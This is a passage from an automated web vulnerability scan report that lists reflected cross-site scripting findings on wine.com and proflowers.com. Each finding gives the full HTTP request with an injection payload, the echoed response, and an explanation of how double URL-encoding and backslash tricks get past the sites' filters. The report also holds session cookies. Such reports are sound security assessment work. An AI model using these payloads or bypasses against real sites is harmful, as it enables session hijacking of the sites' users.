Date: Sun, 13 Feb 2011 14:21:45 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:44 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33430


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/js9a2e2"><script>alert(1)</script>f58af180709/stateSelect.js" value="" />
...[SNIP]...

2.81. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/stateSelect.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e986c897d3dd was submitted in the REST URL parameter 3. This input was echoed as 4c3d6"><script>alert(1)</script>986c897d3dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/js/stateSelect.js4c3d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e986c897d3dd HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:53 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33430
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:52 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/js/stateSelect.js4c3d6"><script>alert(1)</script>986c897d3dd" value="" />
...[SNIP]...

2.82. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/winedotcom.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cba2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1401bd5b008 was submitted in the REST URL parameter 1. This input was echoed as 1cba2"><script>alert(1)</script>1401bd5b008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes1cba2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1401bd5b008/js/winedotcom.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:39 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33429
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:38 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes1cba2"><script>alert(1)</script>1401bd5b008/js/winedotcom.js" value="" />
...[SNIP]...

2.83. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/winedotcom.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca9bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b34047d04 was submitted in the REST URL parameter 2. This input was echoed as ca9bc"><script>alert(1)</script>78b34047d04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/jsca9bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b34047d04/winedotcom.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:47 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:46 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33429


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/jsca9bc"><script>alert(1)</script>78b34047d04/winedotcom.js" value="" />
...[SNIP]...

2.84. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/winedotcom.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4921%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e114b2936cb3 was submitted in the REST URL parameter 3. This input was echoed as c4921"><script>alert(1)</script>114b2936cb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/js/winedotcom.jsc4921%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e114b2936cb3 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:56 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33429


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/js/winedotcom.jsc4921"><script>alert(1)</script>114b2936cb3" value="" />
...[SNIP]...

2.85. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6545857e09 was submitted in the REST URL parameter 3. This input was echoed as a42df"><script>alert(1)</script>f6545857e09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6545857e09 HTTP/1.1
Host: www.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
Set-Cookie: SessionGUID=DBA21E31%2D1D95%2D4BF7%2D9F56%2D4B371470A644; expires=Sat, 11-Feb-2012 22:05:46 GMT; domain=www.wine.com; path=/
Set-Cookie: ASPSESSIONIDACBBTDTS=DKPFPHNCCGJJAFLJLPONMAKD; path=/
Cache-control: private
Date: Fri, 11 Feb 2011 22:05:47 GMT
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 33302


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df"><script>alert(1)</script>f6545857e09" value="" />
...[SNIP]...

2.86. http://www.wine.com/v6/giftcenter/proflowersproduct.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /v6/giftcenter/proflowersproduct.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be123%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2a0408d74d was submitted in the REST URL parameter 3. This input was echoed as be123"><script>alert(1)</script>f2a0408d74d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /v6/giftcenter/proflowersproduct.aspxbe123%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2a0408d74d HTTP/1.1
Host: www.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
Set-Cookie: SessionGUID=A81C8266%2DEEDF%2D4C73%2D9B72%2D85023ED23A29; expires=Sat, 11-Feb-2012 22:06:18 GMT; domain=www.wine.com; path=/
Set-Cookie: ASPSESSIONIDACBBTDTS=JNPFPHNCHIMNNMJFAGJIBNEB; path=/
Cache-control: private
Content-Length: 33288
Date: Fri, 11 Feb 2011 22:06:18 GMT
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/v6/giftcenter/proflowersproduct.aspxbe123"><script>alert(1)</script>f2a0408d74d" value="" />
...[SNIP]...

2.87. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d19\"%3balert(1)//701eaddac4a was submitted in the Referer HTTP header. This input was echoed as 56d19\\";alert(1)//701eaddac4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=56d19\"%3balert(1)//701eaddac4a

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30007882&2/11/2011 2:40:39 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:40:39 GMT
Connection: close
Content-Length: 160106


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007882","30007882","30007882","418466","72","organicgglgeneric_56d19\\";alert(1)//701eaddac4a","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.88. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/A-Valentines-Romance-30046586

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddf49\"%3balert(1)//fd50993c539 was submitted in the Referer HTTP header. This input was echoed as ddf49\\";alert(1)//fd50993c539 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /flowers/A-Valentines-Romance-30046586 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=ddf49\"%3balert(1)//fd50993c539

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30046586&2/11/2011 2:40:24 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:40:24 GMT
Connection: close
Content-Length: 161094


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30046586","30046586","30046586","405390","72","organicgglgeneric_ddf49\\";alert(1)//fd50993c539","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.89. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc43c\"%3balert(1)//6a0c3a4df9f was submitted in the Referer HTTP header. This input was echoed as fc43c\\";alert(1)//6a0c3a4df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=fc43c\"%3balert(1)//6a0c3a4df9f

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?40752&2/11/2011 2:40:17 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:40:17 GMT
Connection: close
Content-Length: 154848


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
endarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("40752","40752","40752","73103","72","organicgglgeneric_fc43c\\";alert(1)//6a0c3a4df9f","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.90. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Valentines-Day-Bouquet-30045703

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63bd1\"%3balert(1)//70a1cda672b was submitted in the Referer HTTP header. This input was echoed as 63bd1\\";alert(1)//70a1cda672b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /flowers/Valentines-Day-Bouquet-30045703 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
